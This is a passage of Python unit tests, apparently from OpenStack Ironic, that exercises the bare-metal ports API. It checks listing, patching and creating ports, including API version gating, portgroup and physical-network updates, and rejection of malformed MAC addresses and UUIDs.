portgroup_id=pg.id)
data = self.get_json('/ports/detail?portgroup=%s' % pg.name,
headers={api_base.Version.string: '1.24'})
self.assertEqual(port.uuid, data['ports'][0]['uuid'])
self.assertEqual(pg.uuid,
data['ports'][0]['portgroup_uuid'])
self.assertEqual(1, len(data['ports']))
def test_get_all_by_portgroup_uuid_and_node_uuid(self):
pg = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id)
response = self.get_json(
'/ports/detail?portgroup=%s&node=%s' % (pg.uuid, self.node.uuid),
headers={api_base.Version.string: '1.24'},
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(api_port.PortsController, '_get_ports_collection')
def test_detail_with_incorrect_api_usage(self, mock_gpc):
# GET /v1/ports/detail specifying node and node_uuid. In this case
# we expect the node_uuid interface to be used.
self.get_json('/ports/detail?node=%s&node_uuid=%s' %
('test-node', self.node.uuid))
mock_gpc.assert_called_once_with(self.node.uuid, mock.ANY, mock.ANY,
mock.ANY, mock.ANY, mock.ANY,
mock.ANY, mock.ANY)
def test_portgroups_subresource_node_not_found(self):
non_existent_uuid = 'eeeeeeee-cccc-aaaa-bbbb-cccccccccccc'
response = self.get_json('/portgroups/%s/ports' % non_existent_uuid,
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
def test_portgroups_subresource_invalid_ident(self):
invalid_ident = '123 123'
response = self.get_json('/portgroups/%s/ports' % invalid_ident,
headers={api_base.Version.string: '1.24'},
expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertIn('Expected a logical name or UUID',
response.json['error_message'])
@mock.patch.object(rpcapi.ConductorAPI, 'update_port', autospec=True,
side_effect=_rpcapi_update_port)
class TestPatch(test_api_base.BaseApiTest):
def setUp(self):
super(TestPatch, self).setUp()
self.node = obj_utils.create_test_node(self.context)
self.port = obj_utils.create_test_port(self.context,
node_id=self.node.id)
p = mock.patch.object(rpcapi.ConductorAPI, 'get_topic_for')
self.mock_gtf = p.start()
self.mock_gtf.return_value = 'test-topic'
self.addCleanup(p.stop)
def _test_success(self, mock_upd, patch, version):
# Helper to test an update to a port that is expected to succeed at a
# given API version.
headers = {api_base.Version.string: version}
response = self.patch_json('/ports/%s' % self.port.uuid,
patch,
headers=headers)
self.assertEqual(http_client.OK, response.status_code)
self.assertTrue(mock_upd.called)
self.assertEqual(self.port.id, mock_upd.call_args[0][2].id)
return response
def _test_old_api_version(self, mock_upd, patch, version):
# Helper to test an update to a port affecting a field that is not
# available in the specified API version.
headers = {api_base.Version.string: version}
response = self.patch_json('/ports/%s' % self.port.uuid,
patch,
expect_errors=True,
headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
self.assertFalse(mock_upd.called)
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_update_byid(self, mock_notify, mock_upd):
extra = {'foo': 'bar'}
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/extra/foo',
'value': 'bar',
'op': 'add'}])
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
self.assertEqual(extra, response.json['extra'])
kargs = mock_upd.call_args[0][2]
self.assertEqual(extra, kargs.extra)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid,
portgroup_uuid=wtypes.Unset),
mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END,
node_uuid=self.node.uuid,
portgroup_uuid=wtypes.Unset)])
def test_update_byaddress_not_allowed(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.address,
[{'path': '/extra/foo',
'value': 'bar',
'op': 'add'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertIn(self.port.address, response.json['error_message'])
self.assertFalse(mock_upd.called)
def test_update_not_found(self, mock_upd):
uuid = uuidutils.generate_uuid()
response = self.patch_json('/ports/%s' % uuid,
[{'path': '/extra/foo',
'value': 'bar',
'op': 'add'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_upd.called)
def test_replace_singular(self, mock_upd):
address = 'aa:bb:cc:dd:ee:ff'
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/address',
'value': address,
'op': 'replace'}])
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
self.assertEqual(address, response.json['address'])
self.assertTrue(mock_upd.called)
kargs = mock_upd.call_args[0][2]
self.assertEqual(address, kargs.address)
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_replace_address_already_exist(self, mock_notify, mock_upd):
address = 'aa:aa:aa:aa:aa:aa'
mock_upd.side_effect = exception.MACAlreadyExists(mac=address)
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/address',
'value': address,
'op': 'replace'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CONFLICT, response.status_code)
self.assertTrue(response.json['error_message'])
self.assertTrue(mock_upd.called)
kargs = mock_upd.call_args[0][2]
self.assertEqual(address, kargs.address)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid,
portgroup_uuid=wtypes.Unset),
mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.ERROR,
obj_fields.NotificationStatus.ERROR,
node_uuid=self.node.uuid,
portgroup_uuid=wtypes.Unset)])
def test_replace_node_uuid(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/node_uuid',
'value': self.node.uuid,
'op': 'replace'}])
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
def test_replace_local_link_connection(self, mock_upd):
switch_id = 'aa:bb:cc:dd:ee:ff'
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path':
'/local_link_connection/switch_id',
'value': switch_id,
'op': 'replace'}],
headers={api_base.Version.string: '1.19'})
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
self.assertEqual(switch_id,
response.json['local_link_connection']['switch_id'])
self.assertTrue(mock_upd.called)
kargs = mock_upd.call_args[0][2]
self.assertEqual(switch_id, kargs.local_link_connection['switch_id'])
def test_remove_local_link_connection_old_api(self, mock_upd):
response = self.patch_json(
'/ports/%s' % self.port.uuid,
[{'path': '/local_link_connection/switch_id', 'op': 'remove'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_code)
def test_set_pxe_enabled_false_old_api(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/pxe_enabled',
'value': False,
'op': 'add'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_code)
def test_add_portgroup_uuid(self, mock_upd):
pg = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='bb:bb:bb:bb:bb:bb',
name='bar')
headers = {api_base.Version.string: '1.24'}
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path':
'/portgroup_uuid',
'value': pg.uuid,
'op': 'add'}],
headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
def test_replace_portgroup_uuid(self, mock_upd):
pg = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='bb:bb:bb:bb:bb:bb',
name='bar')
headers = {api_base.Version.string: '1.24'}
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/portgroup_uuid',
'value': pg.uuid,
'op': 'replace'}],
headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
def test_replace_portgroup_uuid_remove(self, mock_upd):
pg = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='bb:bb:bb:bb:bb:bb',
name='bar')
headers = {api_base.Version.string: '1.24'}
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/portgroup_uuid',
'value': pg.uuid,
'op': 'remove'}],
headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertIsNone(mock_upd.call_args[0][2].portgroup_id)
def test_replace_portgroup_uuid_remove_add(self, mock_upd):
pg = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='bb:bb:bb:bb:bb:bb',
name='bar')
pg1 = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='bb:bb:bb:bb:bb:b1',
name='bbb')
headers = {api_base.Version.string: '1.24'}
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/portgroup_uuid',
'value': pg.uuid,
'op': 'remove'},
{'path': '/portgroup_uuid',
'value': pg1.uuid,
'op': 'add'}],
headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertTrue(pg1.id, mock_upd.call_args[0][2].portgroup_id)
def test_replace_portgroup_uuid_old_api(self, mock_upd):
pg = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='bb:bb:bb:bb:bb:bb',
name='bar')
headers = {api_base.Version.string: '1.15'}
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/portgroup_uuid',
'value': pg.uuid,
'op': 'replace'}],
headers=headers,
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_code)
def test_add_node_uuid(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/node_uuid',
'value': self.node.uuid,
'op': 'add'}])
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
def test_add_node_id(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/node_id',
'value': '1',
'op': 'add'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_code)
self.assertFalse(mock_upd.called)
def test_replace_node_id(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/node_id',
'value': '1',
'op': 'replace'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_code)
self.assertFalse(mock_upd.called)
def test_remove_node_id(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/node_id',
'op': 'remove'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_code)
self.assertFalse(mock_upd.called)
def test_replace_non_existent_node_uuid(self, mock_upd):
node_uuid = '12506333-a81c-4d59-9987-889ed5f8687b'
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/node_uuid',
'value': node_uuid,
'op': 'replace'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_code)
self.assertIn(node_uuid, response.json['error_message'])
self.assertFalse(mock_upd.called)
def test_replace_multi(self, mock_upd):
extra = {"foo1": "bar1", "foo2": "bar2", "foo3": "bar3"}
self.port.extra = extra
self.port.save()
# mutate extra so we replace all of them
extra = dict((k, extra[k] + 'x') for k in extra.keys())
patch = []
for k in extra.keys():
patch.append({'path': '/extra/%s' % k,
'value': extra[k],
'op': 'replace'})
response = self.patch_json('/ports/%s' % self.port.uuid,
patch)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
self.assertEqual(extra, response.json['extra'])
kargs = mock_upd.call_args[0][2]
self.assertEqual(extra, kargs.extra)
def test_remove_multi(self, mock_upd):
extra = {"foo1": "bar1", "foo2": "bar2", "foo3": "bar3"}
self.port.extra = extra
self.port.save()
# Removing one item from the collection
extra.pop('foo1')
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/extra/foo1',
'op': 'remove'}])
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
self.assertEqual(extra, response.json['extra'])
kargs = mock_upd.call_args[0][2]
self.assertEqual(extra, kargs.extra)
# Removing the collection
extra = {}
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/extra', 'op': 'remove'}])
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
self.assertEqual({}, response.json['extra'])
kargs = mock_upd.call_args[0][2]
self.assertEqual(extra, kargs.extra)
# Assert nothing else was changed
self.assertEqual(self.port.uuid, response.json['uuid'])
self.assertEqual(self.port.address, response.json['address'])
def test_remove_non_existent_property_fail(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/extra/non-existent',
'op': 'remove'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_code)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_upd.called)
def test_remove_mandatory_field(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/address',
'op': 'remove'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_code)
self.assertTrue(response.json['error_message'])
self.assertIn('mandatory attribute', response.json['error_message'])
self.assertFalse(mock_upd.called)
def test_add_root(self, mock_upd):
address = 'aa:bb:cc:dd:ee:ff'
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/address',
'value': address,
'op': 'add'}])
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
self.assertEqual(address, response.json['address'])
self.assertTrue(mock_upd.called)
kargs = mock_upd.call_args[0][2]
self.assertEqual(address, kargs.address)
def test_add_root_non_existent(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/foo',
'value': 'bar',
'op': 'add'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_upd.called)
def test_add_multi(self, mock_upd):
extra = {"foo1": "bar1", "foo2": "bar2", "foo3": "bar3"}
patch = []
for k in extra.keys():
patch.append({'path': '/extra/%s' % k,
'value': extra[k],
'op': 'add'})
response = self.patch_json('/ports/%s' % self.port.uuid,
patch)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
self.assertEqual(extra, response.json['extra'])
kargs = mock_upd.call_args[0][2]
self.assertEqual(extra, kargs.extra)
def test_remove_uuid(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/uuid',
'op': 'remove'}],
expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_upd.called)
def test_update_address_invalid_format(self, mock_upd):
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/address',
'value': 'invalid-format',
'op': 'replace'}],
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_upd.called)
def test_update_port_address_normalized(self, mock_upd):
address = 'AA:BB:CC:DD:EE:FF'
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/address',
'value': address,
'op': 'replace'}])
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
self.assertEqual(address.lower(), response.json['address'])
kargs = mock_upd.call_args[0][2]
self.assertEqual(address.lower(), kargs.address)
def test_update_pxe_enabled_allowed(self, mock_upd):
pxe_enabled = True
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/pxe_enabled',
'value': pxe_enabled,
'op': 'replace'}],
headers={api_base.Version.string: '1.19'})
self.assertEqual(http_client.OK, response.status_code)
self.assertEqual(pxe_enabled, response.json['pxe_enabled'])
def test_update_pxe_enabled_old_api_version(self, mock_upd):
pxe_enabled = True
headers = {api_base.Version.string: '1.14'}
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/pxe_enabled',
'value': pxe_enabled,
'op': 'replace'}],
expect_errors=True,
headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
self.assertFalse(mock_upd.called)
def _test_physical_network_success(self, mock_upd, patch,
expected_physical_network):
# Helper to test an update to a port's physical_network that is
# expected to succeed at API version 1.34.
response = self._test_success(mock_upd, patch, '1.34')
self.assertEqual(expected_physical_network,
response.json['physical_network'])
self.port.refresh()
self.assertEqual(expected_physical_network,
self.port.physical_network)
def test_add_physical_network(self, mock_upd):
physical_network = 'physnet1'
patch = [{'path': '/physical_network',
'value': physical_network,
'op': 'add'}]
self._test_physical_network_success(mock_upd, patch, physical_network)
def test_replace_physical_network(self, mock_upd):
self.port.physical_network = 'physnet1'
self.port.save()
new_physical_network = 'physnet2'
patch = [{'path': '/physical_network',
'value': new_physical_network,
'op': 'replace'}]
self._test_physical_network_success(mock_upd, patch,
new_physical_network)
def test_remove_physical_network(self, mock_upd):
self.port.physical_network = 'physnet1'
self.port.save()
patch = [{'path': '/physical_network', 'op': 'remove'}]
self._test_physical_network_success(mock_upd, patch, None)
def _test_physical_network_old_api_version(self, mock_upd, patch,
expected_physical_network):
# Helper to test an update to a port's physical network that is
# expected to fail at API version 1.33.
self._test_old_api_version(mock_upd, patch, '1.33')
self.port.refresh()
self.assertEqual(expected_physical_network, self.port.physical_network)
def test_add_physical_network_old_api_version(self, mock_upd):
patch = [{'path': '/physical_network',
'value': 'physnet1',
'op': 'add'}]
self._test_physical_network_old_api_version(mock_upd, patch, None)
def test_replace_physical_network_old_api_version(self, mock_upd):
self.port.physical_network = 'physnet1'
self.port.save()
patch = [{'path': '/physical_network',
'value': 'physnet2',
'op': 'replace'}]
self._test_physical_network_old_api_version(mock_upd, patch,
'physnet1')
def test_remove_physical_network_old_api_version(self, mock_upd):
self.port.physical_network = 'physnet1'
self.port.save()
patch = [{'path': '/physical_network', 'op': 'remove'}]
self._test_physical_network_old_api_version(mock_upd, patch,
'physnet1')
@mock.patch.object(objects.Port, 'supports_physical_network')
def _test_physical_network_upgrade(self, mock_upd, patch,
expected_physical_network, mock_spn):
# Helper to test an update to a port's physical network that is
# expected to fail at API version 1.34 while the API service is pinned
# to the Ocata release.
mock_spn.return_value = False
self._test_old_api_version(mock_upd, patch, '1.34')
self.port.refresh()
self.assertEqual(expected_physical_network, self.port.physical_network)
def test_add_physical_network_upgrade(self, mock_upd):
patch = [{'path': '/physical_network',
'value': 'physnet1',
'op': 'add'}]
self._test_physical_network_upgrade(mock_upd, patch, None)
def test_replace_physical_network_upgrade(self, mock_upd):
self.port.physical_network = 'physnet1'
self.port.save()
patch = [{'path': '/physical_network',
'value': 'physnet2',
'op': 'replace'}]
self._test_physical_network_upgrade(mock_upd, patch, 'physnet1')
def test_remove_physical_network_upgrade(self, mock_upd):
self.port.physical_network = 'physnet1'
self.port.save()
patch = [{'path': '/physical_network', 'op': 'remove'}]
self._test_physical_network_upgrade(mock_upd, patch, 'physnet1')
def test_invalid_physnet_non_text(self, mock_upd):
physnet = 1234
headers = {api_base.Version.string: versions.MAX_VERSION_STRING}
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/physical_network',
'value': physnet,
'op': 'replace'}],
expect_errors=True,
headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertIn('should be string', response.json['error_message'])
def test_invalid_physnet_too_long(self, mock_upd):
physnet = 'p' * 65
headers = {api_base.Version.string: versions.MAX_VERSION_STRING}
response = self.patch_json('/ports/%s' % self.port.uuid,
[{'path': '/physical_network',
'value': physnet,
'op': 'replace'}],
expect_errors=True,
headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertIn('maximum character', response.json['error_message'])
def test_portgroups_subresource_patch(self, mock_upd):
portgroup = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id)
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
portgroup_id=portgroup.id,
address='52:55:00:cf:2d:31')
headers = {api_base.Version.string: '1.24'}
response = self.patch_json(
'/portgroups/%(portgroup)s/ports/%(port)s' %
{'portgroup': portgroup.uuid, 'port': port.uuid},
[{'path': '/address', 'value': '00:00:00:00:00:00',
'op': 'replace'}], headers=headers, expect_errors=True)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
self.assertEqual('application/json', response.content_type)
@mock.patch.object(rpcapi.ConductorAPI, 'create_port', autospec=True,
side_effect=_rpcapi_create_port)
class TestPost(test_api_base.BaseApiTest):
def setUp(self):
super(TestPost, self).setUp()
self.node = obj_utils.create_test_node(self.context)
self.portgroup = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id)
self.headers = {api_base.Version.string: str(
versions.MAX_VERSION_STRING)}
p = mock.patch.object(rpcapi.ConductorAPI, 'get_topic_for')
self.mock_gtf = p.start()
self.mock_gtf.return_value = 'test-topic'
self.addCleanup(p.stop)
@mock.patch.object(common_utils, 'warn_about_deprecated_extra_vif_port_id',
autospec=True)
@mock.patch.object(notification_utils, '_emit_api_notification')
@mock.patch.object(timeutils, 'utcnow')
def test_create_port(self, mock_utcnow, mock_notify, mock_warn,
mock_create):
pdict = post_get_test_port()
test_time = datetime.datetime(2000, 1, 1, 0, 0)
mock_utcnow.return_value = test_time
response = self.post_json('/ports', pdict, headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
result = self.get_json('/ports/%s' % pdict['uuid'],
headers=self.headers)
self.assertEqual(pdict['uuid'], result['uuid'])
self.assertFalse(result['updated_at'])
return_created_at = timeutils.parse_isotime(
result['created_at']).replace(tzinfo=None)
self.assertEqual(test_time, return_created_at)
# Check location header
self.assertIsNotNone(response.location)
expected_location = '/v1/ports/%s' % pdict['uuid']
self.assertEqual(urlparse.urlparse(response.location).path,
expected_location)
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid,
portgroup_uuid=self.portgroup.uuid),
mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END,
node_uuid=self.node.uuid,
portgroup_uuid=self.portgroup.uuid)])
self.assertEqual(0, mock_warn.call_count)
def test_create_port_min_api_version(self, mock_create):
pdict = post_get_test_port(
node_uuid=self.node.uuid)
pdict.pop('local_link_connection')
pdict.pop('pxe_enabled')
pdict.pop('extra')
pdict.pop('physical_network')
headers = {api_base.Version.string: str(api_v1.MIN_VER)}
response = self.post_json('/ports', pdict, headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertEqual(self.node.uuid, response.json['node_uuid'])
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
def test_create_port_doesnt_contain_id(self, mock_create):
with mock.patch.object(self.dbapi, 'create_port',
wraps=self.dbapi.create_port) as cp_mock:
pdict = post_get_test_port(extra={'foo': 123})
self.post_json('/ports', pdict, headers=self.headers)
result = self.get_json('/ports/%s' % pdict['uuid'],
headers=self.headers)
self.assertEqual(pdict['extra'], result['extra'])
cp_mock.assert_called_once_with(mock.ANY)
# Check that 'id' is not in first arg of positional args
self.assertNotIn('id', cp_mock.call_args[0][0])
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
@mock.patch.object(notification_utils.LOG, 'exception', autospec=True)
@mock.patch.object(notification_utils.LOG, 'warning', autospec=True)
def test_create_port_generate_uuid(self, mock_warning, mock_exception,
mock_create):
pdict = post_get_test_port()
del pdict['uuid']
response = self.post_json('/ports', pdict, headers=self.headers)
result = self.get_json('/ports/%s' % response.json['uuid'],
headers=self.headers)
self.assertEqual(pdict['address'], result['address'])
self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
self.assertFalse(mock_warning.called)
self.assertFalse(mock_exception.called)
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_create_port_error(self, mock_notify, mock_create):
mock_create.side_effect = Exception()
pdict = post_get_test_port()
self.post_json('/ports', pdict, headers=self.headers,
expect_errors=True)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid,
portgroup_uuid=self.portgroup.uuid),
mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.ERROR,
obj_fields.NotificationStatus.ERROR,
node_uuid=self.node.uuid,
portgroup_uuid=self.portgroup.uuid)])
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
def test_create_port_valid_extra(self, mock_create):
pdict = post_get_test_port(extra={'str': 'foo', 'int': 123,
'float': 0.1, 'bool': True,
'list': [1, 2], 'none': None,
'dict': {'cat': 'meow'}})
self.post_json('/ports', pdict, headers=self.headers)
result = self.get_json('/ports/%s' % pdict['uuid'],
headers=self.headers)
self.assertEqual(pdict['extra'], result['extra'])
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
def test_create_port_no_mandatory_field_address(self, mock_create):
pdict = post_get_test_port()
del pdict['address']
response = self.post_json('/ports', pdict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_create.called)
def test_create_port_no_mandatory_field_node_uuid(self, mock_create):
pdict = post_get_test_port()
del pdict['node_uuid']
response = self.post_json('/ports', pdict, expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_create.called)
def test_create_port_invalid_addr_format(self, mock_create):
pdict = post_get_test_port(address='invalid-format')
response = self.post_json('/ports', pdict, expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_create.called)
def test_create_port_address_normalized(self, mock_create):
address = 'AA:BB:CC:DD:EE:FF'
pdict = post_get_test_port(address=address)
self.post_json('/ports', pdict, headers=self.headers)
result = self.get_json('/ports/%s' % pdict['uuid'],
headers=self.headers)
self.assertEqual(address.lower(), result['address'])
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
def test_create_port_with_hyphens_delimiter(self, mock_create):
pdict = post_get_test_port()
colonsMAC = pdict['address']
hyphensMAC = colonsMAC.replace(':', '-')
pdict['address'] = hyphensMAC
response = self.post_json('/ports', pdict, expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_create.called)
def test_create_port_invalid_node_uuid_format(self, mock_create):
pdict = post_get_test_port(node_uuid='invalid-format')
response = self.post_json('/ports', pdict, expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_create.called)
def test_node_uuid_to_node_id_mapping(self, mock_create):
pdict = post_get_test_port(node_uuid=self.node['uuid'])
self.post_json('/ports', pdict, headers=self.headers)
# GET doesn't return the node_id it's an internal value
port = self.dbapi.get_port_by_uuid(pdict['uuid'])
self.assertEqual(self.node['id'], port.node_id)
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
def test_create_port_node_uuid_not_found(self, mock_create):
pdict = post_get_test_port(
node_uuid='1a1a1a1a-2b2b-3c3c-4d4d-5e5e5e5e5e5e')
response = self.post_json('/ports', pdict, expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_create.called)
def test_create_port_portgroup_uuid_not_found(self, mock_create):
pdict = post_get_test_port(
portgroup_uuid='1a1a1a1a-2b2b-3c3c-4d4d-5e5e5e5e5e5e')
response = self.post_json('/ports', pdict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_create.called)
def test_create_port_portgroup_uuid_not_found_old_api_version(self,
mock_create):
pdict = post_get_test_port(
portgroup_uuid='1a1a1a1a-2b2b-3c3c-4d4d-5e5e5e5e5e5e')
response = self.post_json('/ports', pdict, expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_create.called)
def test_create_port_portgroup(self, mock_create):
pdict = post_get_test_port(
portgroup_uuid=self.portgroup.uuid,
node_uuid=self.node.uuid)
response = self.post_json('/ports', pdict, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
